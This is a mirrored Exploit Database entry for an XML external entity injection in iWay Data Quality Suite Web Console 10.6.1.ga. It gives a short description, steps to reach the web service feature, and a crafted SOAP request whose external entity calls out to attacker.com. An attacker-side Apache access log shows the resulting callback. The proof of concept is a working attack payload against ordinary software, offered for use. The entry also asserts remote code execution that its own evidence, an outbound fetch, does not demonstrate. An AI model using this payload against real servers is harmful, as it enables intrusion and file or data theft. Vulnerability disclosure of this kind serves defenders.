iWay Data Quality Suite Web Console 10.6.1.ga – XML External Entity Injection

• Exploit Database
• 19 阅读

• 作者： Sureshbabu Narvaneni
  日期： 2018-09-27
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/45498/

• # Exploit Title: iWay Data Quality Suite Web Console 10.6.1.ga-2016-11-20 – XML External Entity Injection
  # Google Dork: N/A
  # Date: 2018-09-27
  # Exploit Author: Sureshbabu Narvaneni#
  # Author Blog : https://nullnews.in
  # Vendor Homepage: www.informationbuilders.co.uk
  # Software Link: http://www.informationbuilders.co.uk/products/integrity/dqsuite
  # Affected Version: 10.6.1.ga
  # Category: WebApps
  # Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686
  # CVE : N/A
  
  # Technical Description:
  # iWay Data Quality Suite Web Console provides web services features. As there is no
  # validation present on the web services featured by product while processing
  # the user input an attacker can easily inject external entities in the SOAP request and can 
  # achieve the successful Remote Code Execution on the server
  
  # Proof Of Concept:
  
  > Access the iWay DQS Web Console application section.
  > Create an entry for web service and form a sample SOAP request.
  > Send below crafted request to the server to confirm the vulnerability
  
  <?xml version="1.0"?>
  <!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://attacker.com/xxetest">]>
  <soapenv:Envelope
  xml:soapenv="http://schemas.xmlsoap.org/soap/envelope"
  xmlns:ws="http://www.example.com/ws">
  <soapenv:Header/>
  <soapenv:Body>
  <ws:test>
  <ws:in>&xxe;</ws:in>
  </ws:test>
  </soapenv:Body>
  </soapenv:Envelope>
  
  > The below log shows that the web service component is vulnerable to XXE.
  
  root@MrR3boot:/var/www/html# tail -f /var/log/apache2/access.log
  1xx.xx.xxx.xx - - [25/Sep/2018:01:13:42 -0400] "GET /xxetest HTTP/1.0" 404
  474 "-" "-"